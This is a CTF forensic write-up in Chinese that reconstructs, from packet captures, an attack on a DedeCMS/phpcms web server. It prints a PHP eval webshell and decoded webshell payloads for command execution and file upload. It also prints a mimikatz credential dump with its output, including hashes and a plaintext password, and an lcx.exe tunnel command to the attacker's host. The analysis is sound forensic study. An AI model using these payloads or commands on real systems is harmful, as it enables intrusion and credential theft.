[信息安全铁人三项赛总决赛](数据赛)第四题

WriteUps

信息安全铁人三项赛总决赛总结(企业赛)
信息安全铁人三项赛总决赛(数据赛)第二题
信息安全铁人三项赛总决赛(数据赛)第三题
信息安全铁人三项赛总决赛(数据赛)第四题

所有题目 : https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00004.md

image.png

有人在进行目录扫描
基本上可以确定 , 一个潜在的攻击者 , 以及被攻击者

攻击者 : 172.16.10.110
被攻击者 : 192.168.20.117

首先过滤出这两者之间的所有数据包

PS :
感觉还是在发现攻击者和被攻击者之后直接提取出他们之间的所有数据包比较靠谱

#!/bin/bash
#attack_dump.sh

target_folder='attack'

mkdir ${target_folder}

for file in `ls *.pcap`;
do
   echo "Dumping attack package in ${file}..."
   tcpdump -A -s 0 'host 172.16.10.110 or host 192.168.20.117' -r $file -w ${target_folder}/${file}
   echo "${file} Done!"
done

同时也生成了 http 的数据包
还是感觉直接搜索 http 的文本来的比较快

首先直接 grep 看看有没有小马什么的

888849-Connection: Keep-Alive
888850-Content-Type: text/plain
888851-
888852:<?php @eval($_POST['t'])?>
888853-17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1927878527:1927879124, ack 2736838709, win 64240, length 597
888854-E..}.k@...St..
888855-n...u"...r.... .5P.......POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

不过居然是个文本文件 ?

image.png

再往上下翻翻居然发现了一个小马

image.png

这里的小马好像有一些特征 :
比如说 :

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
array_map

根据这个特性进行搜索

grep -n -C 5 'spider.html' http.txt | grep 'POST '

果然发现了两个小马 :

/9.php
/uploadfile/2017/0905/20170905055411283.php
image.png

猜想这两个小马可能是通过漏洞写入的
直接搜索 9.php 最开始出现的地方

image.png

image.png

搜索一下 /admin/file_manage_control.php
发现是织梦CMS
利用的漏洞应该是 :

http://www.cnblogs.com/LittleHann/p/4237578.html

可以看到首先攻击者利用了上述漏洞 9.php 写入服务器

image.png

而搜索另一个小马的时候却发现是直接就进行了利用
而且文件名是以时间的形式命名
猜想是利用了文件上传漏洞将文件上传到服务器的

根据数据包详情 , 找到了如下一篇文章 :

http://0day5.com/archives/4368/ (phpcms v9 前台 GetShell)
这个漏洞在利用的过程中用到了 1.txt

继续向前回溯

找到攻击者是通过 9.php 写入了 1.txt 这个文件

image.png
image.png

继续向前分析 , 攻击者在触发 DedeCMS 写入 9.php 的时候需要得到管理员的密码
那么在这之前肯定对密码进行了爆破

grep -n 'POST ' http.txt | awk -F 'POST ' '{print $2}' | awk -F 'HTTP/1.1' '{print $1}' | sort | uniq -c
image.png

经过寻找发现 , 攻击者几乎是已经知道了登录后台的密码 , 并没有经过爆破 , 而是直接登录


image.png
gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC
gotopage=/admin/&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=

用户名为 : admin
密码为 : 19901109

让攻击者直接知道密码就登录
可能性有很多
有可能是攻击者直接通过注入得到了管理员密码
也有可能是通过社工
也可能是敏感信息泄露等等

经过研究发现应该不会是明注得到的管理员密码
因为在流量包中不能检索到别的相同的字符串

image.png

尝试检测是否存在盲注的情况
...可能因为能力有限 , 并没有分析出来...

接下来可以看看攻击者都使用两个小马做了什么
首先看 9.php

grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g'

grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' | tr -d '()";\\\' | tr -d "'"

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 获取系统版本以及用户名等信息
C:\phpStudy\WWW  C:  Windows NT WANGGUAN-C938A1 5.2 build 3790 (Windows Server 2003 Enterprise x64 Edition Service Pack 2) i586(Administrator)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件
./   2017-09-05 17:34:52 0   0777
../ 2017-08-29 11:16:35 0   0777
a/  2017-09-05 16:05:51 0   0777
admin/  2017-09-05 16:05:51 0   0777
data/   2017-09-05 16:18:01 0   0777
images/ 2017-09-05 16:03:30 0   0777
include/    2017-09-05 16:03:21 0   0777
install/    2017-09-05 16:06:08 0   0777
member/ 2017-09-05 16:03:24 0   0777
phpMyAdmin/ 2017-08-29 11:16:15 0   0777
plus/   2017-09-05 16:05:51 0   0777
special/    2017-09-05 16:05:51 0   0777
templets/   2017-09-05 16:03:26 0   0777
uploads/    2017-09-05 16:05:51 0   0777
9.php   2017-09-05 17:34:52 26  0666
favicon.ico 2010-03-11 15:45:00 1150    0666
index.php   2010-02-07 17:05:00 738 0666
robots.txt  2010-02-07 17:05:00 505 0666
tags.php    2010-02-07 17:05:00 633 0666
wap.php 2010-02-07 17:05:00 3938    0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 获取系统版本以及用户名等信息

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 whoami
wangguan-c938a1\administrator

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&ipconfig&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 ipconfig
Windows IP Configuration.               
.                    
.                    
Ethernet adapter ........:.             
.                    
   Connection-specific DNS Suffix  . : .           
   IP Address. . . . . . . . . . . . : 192.168.20.117.
   Subnet Mask . . . . . . . . . . . : 255.255.255.0.
   Default Gateway . . . . . . . . . : 192.168.20.1.

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&systeminfo&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 systeminfo
......:           WANGGUAN-C938A1
OS ....:          Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS ....:          5.2.3790 Service Pack 2 Build 3790
OS ......:        Microsoft Corporation
OS ....:          ..........
OS ........:      Uniprocessor Free
............:     wangguan
..........:               
.... ID:          91353-645-7659413-50864
............:     2017-8-29, 10:14:19
............:     0 .. 2 .... 55 .. 11 ..
..........:       VMware, Inc.
........:         VMware Virtual Platform
........:         x64-based PC
......:           ...... 1 ..........
                  [01]: EM64T Family 6 Model 60 Stepping 3 GenuineIntel ~3400 Mhz
BIOS ....:        UNKNOWN 
Windows ....:     C:\WINDOWS
........:         C:\WINDOWS\system32
........:         \Device\HarddiskVolume1
............:     zh-cn;....(....)
..............:   zh-cn;....(....)
....:             (GMT+08:00) ....................................
............:     1,023 MB
..............:   379 MB  
........: ......: 2,299 MB
........: ....:   1,854 MB
........: ......: 445 MB  
............:     C:\pagefile.sys
..:               WORKGROUP
..........:       \\WANGGUAN-C938A1
........:         ...... 1 ............
                  [       
17:35:41.557144 IP 192.168.20.117.http > 172.16.10.110.5299: Flags [P.], seq 2606:2963, ack 4254, win 64240, length 357: HTTP
E...TG@........u..        
n.P......5..QP...."..01]: Q147222
....:             ...... 1 .. NIC..
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      ......:      ........
                      .... DHCP:   ..                                                                                          
                      DHCP ......: 192.168.20.1
                      IP ....
                      [01]: 192.168.20.117
[S]                       

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\mimikatz.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传本地文件保存到 C:\\phpStudy\\WWW\\mimikatz.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt
// 使用 mimikatz.exe 搜集系统密码并输出到 C:\\phpStudy\\WWW\\log.txt 中

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 读取文件内容 : C:\\phpStudy\\WWW\\log.txt
  .#####.   mimikatz 2.1.1 (x64) built on Apr  9 2017 23:24:20
 .## ^ ##.  "A La Vie, A L'Amour"                   
 ## / \ ##  /* * *                                  
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */
                                                    
mimikatz(commandline) # privilege::debug            
Privilege '20' OK                                   
                                                    
mimikatz(commandline) # sekurlsa::logonpasswords    
                                                    
Authentication Id : 0 ; 996 (00000000:000003e4)     
Session           : Service from 0                  
User Name         : NETWORK SERVICE                 
Domain            : NT AUTHORITY                    
Logon Server      : (null)                          
Logon Time        : 2017-9-5 14:40:42               
SID               : S-1-5-20                        
    msv :                                           
     [00000002] Primary                             
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * LM       : aad3b435b51404eeaad3b435b51404ee  
     * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0       
     * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
    wdigest :                                       
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    kerberos :                                      
     * Username : wangguan-c938a1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    ssp :                                           
    credman :                                       
                                                    
Authentication Id : 0 ; 216713 (00000000:00034e89)  
Session           : Interactive from 0              
Us                                                                                                                         
17:36:47.042287 IP 192.168.20.117.http > 172.16.10.110.5303: Flags [.], seq 1461:2921, ack 767, win 63473, length 1460: HTTP
E...V.@........u..                                  
n.P...#U....8P....n..er Name         : Administrator                                                                          
Domain            : WANGGUAN-C938A1                 
Logon Server      : WANGGUAN-C938A1                 
Logon Time        : 2017-9-5 14:41:24               
SID               : S-1-5-21-2640452580-1396535521-4086226850-500
    msv :                                           
     [00000002] Primary                             
     * Username : Administrator                     
     * Domain   : WANGGUAN-C938A1
     * LM       : 1160eb40860de5aeb75e0c8d76954a50
     * NTLM     : 74e0fa3bf5a67fd3b43ed8912042fabb       
     * SHA1     : 9d464a83db1089ff0b49c72938d2806953594714
    wdigest :      
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    kerberos :     
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    ssp :       
    credman :   
                
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null) 
Logon Time        : 2017-9-5 14:40:42
SID               : S-1-5-19
    msv :       
    wdigest :   
    kerberos :     
     * Username : (null)  
     * Domain   : (null)  
     * Password : (null)  
    ssp :       
    credman :   
                
Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)          
Logon Time        : 2017-9-5 14:40:42
SID               : 
    msv :       
    wdigest :   
    kerberos :  
    ssp :       
    credman :                                                                    
                
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType f


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\log.txt';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件内容 : C:\\phpStudy\\WWW\\log.txt

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\DTools.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传文件保存至 : C:\\phpStudy\\WWW\\DTools.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\data\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\data\\common.inc.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 获取文件内容 : C:\\phpStudy\\WWW\\data\\common.inc.php
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\data\\common.inc.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 获取文件内容 : C:\\phpStudy\\WWW\\data\\common.inc.php
<?php                    
//..............            
$cfg_dbhost = 'localhost';  
$cfg_dbname = 'dedecms';    
$cfg_dbuser = 'root';       
$cfg_dbpwd = 'root';        
$cfg_dbprefix = 'dede_';    
$cfg_db_language = 'gbk';                               
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\data\\22.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传文件保存至 : C:\\phpStudy\\WWW\\data\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\data\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\phpStudy\\WWW\\data\\22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 : C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传文件保存至 : C:\\Hscan***.zip

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\ 目录下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上传文件保存至 : C:\\Hscan***.zip

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\ 目录下的所有文件
Documents and Settings/  2017-08-30 10:26:49 0   0777
phpStudy/   2017-08-29 11:16:35 0   0777
Program Files/  2017-08-29 10:19:09 0   0555
Program Files (x86)/    2017-08-29 10:10:05 0   0555
RECYCLER/   2017-08-29 11:24:41 0   0777
System Volume Information/  2017-08-29 10:15:42 0   0777
WINDOWS/    2017-09-05 17:50:05 0   0777
wmpub/  2017-08-29 10:11:11 0   0777
AUTOEXEC.BAT    2017-08-29 10:10:54 0   0777
boot.ini    2017-08-29 10:06:43 221 0666
bootfont.bin    2007-03-07 20:00:00 322730  0444
CONFIG.SYS  2017-08-29 10:10:54 0   0666
Hscan...........zip 2017-09-05 17:41:19 1170778 0666
IO.SYS  2017-08-29 10:10:54 0   0444
lcx.exe 2017-09-05 17:49:48 8704    0777
MSDOS.SYS   2017-08-29 10:10:54 0   0444
NTDETECT.COM    2007-03-07 20:00:00 47772   0555
ntldr   2007-03-07 20:00:00 306288  0444 
pagefile.sys    2017-09-05 14:40:40 1610612736  0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行系统命令 C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';;echo("X@Y");die();
// 写入文件 C:\\phpStudy\\WWW\\1.txt
<?php @eval($_POST['t'])?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

